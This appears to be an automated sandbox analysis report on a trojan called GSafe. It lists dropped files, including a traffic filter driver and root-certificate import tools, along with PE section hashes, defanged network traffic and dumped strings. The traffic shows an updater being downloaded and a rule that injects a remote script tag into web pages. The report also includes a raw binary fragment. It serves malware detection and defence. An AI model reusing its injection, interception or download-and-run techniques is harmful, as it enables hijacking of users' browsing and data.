%Program Files%\GSafe\remove_GSafe.exe (1568 bytes)
%Program Files%\GSafe\ProtocolFilters.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy81.tmp (81025 bytes)
%Program Files%\GSafe\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (782 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
%Program Files%\GSafe\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (11 bytes)
%Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (6 bytes)
%Program Files%\GSafe\nfapi.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GSafe\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
%Program Files%\GSafe\GSafe.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
| .rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
| .data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
| .ndata | 147456 | 32768 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 180224 | 2536 | 2560 | 3.13573 | e844fdd69bdbb3983f3935842639207a |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 111
fe19430e206762bb2e9b7a8eda606fd5
85f9955ab6934d697288afd27dc7a58c
b3e92e650e999225a6bcdb3f02de6978
cb4a17cbf388b6948f137d6ebec938a3
d54c4d7cc93b9cd1df7ed6e502496d89
513f348df39c996229766bb0643038d8
c3bbb39ced8892724124da1b0c590e36
ff5fc30bb03f0539b766d88853d3cafc
dcfe26b4d104544bfbca806dd835ee5e
c9ef48ddcc60d7fd75bfbbd11372428f
3c401a3f1acb19112187a86d704428b2
422966a56e088b291ba42264431ed8f5
84896e31abdc7c299ba1cf27c2857e2e
883ea9e858595dfb411cbc9a5d0eb496
2f40b14a6d586464338f1867dc4f6bd2
0605a356bf1c88c1a8b838819afdbb43
7b799bda39cde1f9759fa8c2a79c49cb
edaf8e666446f746cecd150d29a7688f
ca829f86af0a8b02dfa65dbd4d4721c9
e967a0b717d494b8291639d8a0e46344
a848c2b153e8fb4dd27bdaf6dc42e860
75c60a885096fc4cee2e4fa9357044b5
18b197ab50049e884e346f38c4fab398
ea4fd2a497d37e841cbda16b73520c25
1127efcd3bf48bb7b3b4ad29da66bed9
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://www.gencolabsllc.com/services/hdtv_rules.php | |
| hxxp://www.gencolabsllc.com/services/update.php?affid=hdtv&v=1.0.0&key=2rLVemqiV8QPrfThkbebR75aYB35Y4gu&dummy=404 | |
| hxxp://www.gencolabsllc.com/bin/gsafe_update.exe?dummy=573 | |
| hxxp://gencolabsllc.com/bin/gsafe_update.exe?dummy=573 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /services/update.php?affid=hdtv&v=1.0.0&key=2rLVemqiV8QPrfThkbebR75aYB35Y4gu&dummy=404 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:25 GMT
Content-Type: text/plain
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
hXXp://gencolabsllc.com/bin/gsafe_update.exe..
GET /services/hdtv_rules.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
</head>|<script src="hXXps://gsafejs.me/services/hdtv/hdtv.js"></script></head>...
GET /services/hdtv_rules.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
</head>|<script src="hXXps://gsafejs.me/services/hdtv/hdtv.js"></script></head>...
GET /bin/gsafe_update.exe?dummy=573 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gencolabsllc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:25 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
Last-Modified: Wed, 31 Dec 2014 11:01:01 GMT
ETag: "59c21d0-383c7-50b8105e2f540"
Accept-Ranges: bytes
Content-Length: 230343
X-Cache: BYPASS
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
GSafe.exe_1268:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
HelpKeywordp
HelpKeywordp
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress
OnKeyPress
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeywordT
HelpKeywordT
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecutepWE
OnExecutepWE
127.0.0.1
127.0.0.1
255.0.0.0
255.0.0.0
ServiceExecute
ServiceExecute
\P_CheckUpdate.txt
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
\nj_update.exe
hXXp://VVV.gencolabsllc.com/services/
hXXp://VVV.gencolabsllc.com/services/
_rules.php
_rules.php
hXXp://VVV.gencolabsllc.com/services/update.php?affid=
hXXp://VVV.gencolabsllc.com/services/update.php?affid=
&key=
&key=
\P_RuleList.txt
\P_RuleList.txt
[E] ProductKey :
[E] ProductKey :
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start GSafe
cmd.exe /c net start GSafe
cmd.exe /c net stop GSafe
cmd.exe /c net stop GSafe
c:\log.log
c:\log.log
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_tcpDisableFiltering
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_setTCPTimeout
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
pfc_setRootSSLCertSubject
5l6O6W6
5l6O6W6
?!?%?)?-?1?5?9?=?
?!?%?)?-?1?5?9?=?
5%6x6
5%6x6
1 1$1(1,1014181
1 1$1(1,1014181
0&0.080=0
0&0.080=0
2%3)3-31383
2%3)3-31383
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
1#1'1 1/13171;1
=!=,=7=?=_=
=!=,=7=?=_=
5 5$5(5,505
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3
3 3$3(3,3034383
3 3$3(3,3034383
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
KWindows
KWindows
UrlMon
UrlMon
OnExecute
OnExecute
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation